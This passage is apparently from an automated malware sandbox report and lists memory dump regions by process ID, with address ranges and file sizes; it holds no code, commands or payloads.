                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3088-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/3088-144-0x00000000001C0000-0x00000000001C1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3088-181-0x00000000008E0000-0x00000000008E1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3088-195-0x000000001AEE0000-0x000000001AEE2000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                  • memory/3176-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/3764-241-0x0000000005CA0000-0x0000000005CA1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3764-204-0x00000000016D0000-0x00000000016D1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3764-186-0x0000000000D60000-0x0000000000D61000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3764-208-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3764-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/3860-239-0x00000000009E0000-0x00000000009E1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3860-215-0x0000000077CA0000-0x0000000077E2E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                  • memory/3860-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/3860-347-0x0000000005B70000-0x0000000005B71000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3868-199-0x0000000004EA0000-0x0000000004EA1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3868-217-0x0000000004E60000-0x0000000005466000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                  • memory/3868-172-0x0000000000690000-0x0000000000691000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3868-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/3868-271-0x00000000051E0000-0x00000000051E1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3868-197-0x0000000005470000-0x0000000005471000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3868-227-0x0000000004F40000-0x0000000004F41000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3976-346-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/3976-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/3976-249-0x0000000077CA0000-0x0000000077E2E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                  • memory/3976-243-0x0000000000220000-0x0000000000221000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4060-618-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4124-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4148-624-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4240-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4288-623-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4300-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4348-458-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4476-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4476-214-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    80KB

                                                                                                                                                                                                  • memory/4556-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4572-330-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-326-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-339-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-337-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-341-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4572-343-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-258-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-334-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-336-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-333-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-340-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-332-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-331-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-256-0x0000000003940000-0x000000000397C000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    240KB

                                                                                                                                                                                                  • memory/4572-329-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-267-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-282-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-319-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-306-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4572-298-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4KB

                                                                                                                                                                                                  • memory/4588-236-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    12KB

                                                                                                                                                                                                  • memory/4588-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4624-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4644-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4644-392-0x000002A0F6670000-0x000002A0F673F000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    828KB

                                                                                                                                                                                                  • memory/4644-390-0x000002A0F6600000-0x000002A0F666F000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    444KB

                                                                                                                                                                                                  • memory/4696-370-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4748-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4748-393-0x0000000000640000-0x0000000000642000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                  • memory/4832-316-0x0000000005770000-0x0000000005D76000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                  • memory/4832-273-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    120KB

                                                                                                                                                                                                  • memory/4840-274-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    120KB

                                                                                                                                                                                                  • memory/4840-279-0x0000000000418F7A-mapping.dmp
                                                                                                                                                                                                  • memory/4840-321-0x0000000005540000-0x0000000005B46000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                  • memory/4860-324-0x0000000005610000-0x0000000005B0E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    5.0MB

                                                                                                                                                                                                  • memory/4860-276-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    120KB

                                                                                                                                                                                                  • memory/4860-283-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                  • memory/4880-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/4988-423-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5036-314-0x0000000000418F76-mapping.dmp
                                                                                                                                                                                                  • memory/5044-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5056-467-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5116-362-0x000002524A873000-0x000002524A875000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                  • memory/5116-361-0x000002524A870000-0x000002524A872000-memory.dmp
                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8KB

                                                                                                                                                                                                  • memory/5116-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5148-470-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5160-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5188-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5212-477-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5280-481-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5320-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5328-485-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5384-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5396-490-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5416-546-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5428-492-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5456-494-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5488-499-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5548-502-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5596-506-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5704-514-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                  • memory/5780-569-0x00007FF6ADAD4060-mapping.dmp
                                                                                                                                                                                                  • memory/6108-541-0x0000000000000000-mapping.dmp